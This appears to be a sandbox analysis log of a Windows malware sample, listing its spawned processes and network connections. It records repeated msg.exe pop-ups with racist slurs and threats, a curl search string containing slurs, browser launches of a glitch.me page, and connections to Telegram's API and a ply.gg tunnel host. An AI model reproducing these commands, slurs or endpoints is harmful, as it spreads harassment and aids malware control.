"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2248,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9036 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=7972,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=3956,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8468 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=13704,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5680 /prefetch:2

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 sky-aerial-derby.glitch.me udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 sky-aerial-derby.glitch.me udp
US 151.101.194.59:443 sky-aerial-derby.glitch.me tcp
US 8.8.8.8:53 crl.starfieldtech.com udp
US 192.124.249.31:80 crl.starfieldtech.com tcp
US 8.8.8.8:53 looking-brings.gl.at.ply.gg udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
